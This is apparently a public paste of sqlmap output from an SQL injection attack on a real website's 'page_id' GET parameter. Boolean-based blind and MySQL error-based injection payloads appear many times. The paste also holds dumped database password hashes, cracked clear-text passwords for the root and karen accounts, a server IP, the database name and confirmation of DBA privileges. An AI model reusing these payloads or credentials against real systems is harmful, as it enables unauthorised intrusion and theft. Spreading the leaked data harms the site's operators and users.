  850.     Title: AND boolean-based blind - WHERE OR HAVING clause
  851.     Payload: page_id=28167956 AND 1228=1228
  852.  
  853.     TYPE: error-based
  854.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  855.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  856. ---
  857.  
  858. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  859. ---
  860. Place: GET
  861. Parameter: page_id
  862.     TYPE: boolean-based blind
  863.     Title: AND boolean-based blind - WHERE OR HAVING clause
  864.     Payload: page_id=28167956 AND 1228=1228
  865.  
  866.     TYPE: error-based
  867.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  868.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  869. ---
  870.  
  871. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  872. ---
  873. Place: GET
  874. Parameter: page_id
  875.     TYPE: boolean-based blind
  876.     Title: AND boolean-based blind - WHERE OR HAVING clause
  877.     Payload: page_id=28167956 AND 1228=1228
  878.  
  879.     TYPE: error-based
  880.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  881.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  882. ---
  883.  
  884. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  885. ---
  886. Place: GET
  887. Parameter: page_id
  888.     TYPE: boolean-based blind
  889.     Title: AND boolean-based blind - WHERE OR HAVING clause
  890.     Payload: page_id=28167956 AND 1228=1228
  891.  
  892.     TYPE: error-based
  893.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  894.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  895. ---
  896.  
  897. DATABASE management system users password hashes:
  898. [*] karen [2]:
  899.     password hash: 1c00fc2b05570f2f
  900.     password hash: 248036c235f60aa8
  901. [*] nujeplies [1]:
  902.     password hash: NULL
  903. [*] root [5]:
  904.     password hash: 248036c235f60aa8
  905.     password hash: 248036c235f60aa8
  906.     password hash: 4fc67fc309a271b8
  907.     clear-text password: karen
  908.     clear-text password: karen
  909.     password hash: 4fc67fc309a271b8
  910.     clear-text password: karen
  911.     clear-text password: karen
  912.     password hash: NULL
  913. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  914. ---
  915. Place: GET
  916. Parameter: page_id
  917.     TYPE: boolean-based blind
  918.     Title: AND boolean-based blind - WHERE OR HAVING clause
  919.     Payload: page_id=28167956 AND 1228=1228
  920.  
  921.     TYPE: error-based
  922.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  923.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  924. ---
  925.  
  926. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  927. ---
  928. Place: GET
  929. Parameter: page_id
  930.     TYPE: boolean-based blind
  931.     Title: AND boolean-based blind - WHERE OR HAVING clause
  932.     Payload: page_id=28167956 AND 1228=1228
  933.  
  934.     TYPE: error-based
  935.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  936.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  937. ---
  938.  
  939. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  940. ---
  941. Place: GET
  942. Parameter: page_id
  943.     TYPE: boolean-based blind
  944.     Title: AND boolean-based blind - WHERE OR HAVING clause
  945.     Payload: page_id=28167956 AND 1228=1228
  946.  
  947.     TYPE: error-based
  948.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  949.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  950. ---
  951.  
  952. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  953. ---
  954. Place: GET
  955. Parameter: page_id
  956.     TYPE: boolean-based blind
  957.     Title: AND boolean-based blind - WHERE OR HAVING clause
  958.     Payload: page_id=28167956 AND 1228=1228
  959.  
  960.     TYPE: error-based
  961.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  962.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  963. ---
  964.  
  965. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  966. ---
  967. Place: GET
  968. Parameter: page_id
  969.     TYPE: boolean-based blind
  970.     Title: AND boolean-based blind - WHERE OR HAVING clause
  971.     Payload: page_id=28167956 AND 1228=1228
  972.  
  973.     TYPE: error-based
  974.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  975.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  976. ---
  977.  
  978. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  979. ---
  980. Place: GET
  981. Parameter: page_id
  982.     TYPE: boolean-based blind
  983.     Title: AND boolean-based blind - WHERE OR HAVING clause
  984.     Payload: page_id=28167956 AND 1228=1228
  985.  
  986.     TYPE: error-based
  987.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  988.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  989. ---
  990.  
  991. banner:    '5.0.45-log'
  992.  
  993. CURRENT USER:    'root@208.43.165.226'
  994.  
  995. CURRENT DATABASE:    'orcataco_bumperstic'
  996.  
  997. CURRENT USER IS DBA:    'True'
clone this paste RAW Paste Data